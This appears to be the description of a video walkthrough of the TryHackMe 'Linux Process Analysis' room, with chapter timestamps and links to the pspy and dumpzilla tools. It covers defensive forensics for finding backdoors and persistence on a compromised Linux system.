Linux Process Analysis - TryHackMe Walkthrough

Brief: An indepth dive into compromised linux system/ server, command line forensics, backdoor running services, user mode and system mode cronjobs to clean/ disinfect an infected linux system and investigate different levels of infection and persistence. Utilization of ps -aux, pstree, lsof, systemctl, dumpzilla, journalctl and pspy64 for looking at problem with different angles a thought provoking and helpful room for malware forensics and enterprise incident responders. Chapters. 0:00 - Introduction 2:05 - LSOF Command 2:28 - pstree Command 5:43 - Cronjobs (System/ User Level) 12:16 - PsPy Tool 13:03 - CyberChef 13:49 - Services Info 14:40 - JournalCtl Logs 16:14 - Autostarts Investigation 19:11 - .viminfo log 19:59 - Dumpzilla References. https://github.com/DominicBreuker/pspy (pspy - Monitor linux processes without root permissions) https://github.com/Busindre/dumpzilla (Extract all forensic interesting information of Firefox, Iceweasel and Seamonkey browsers)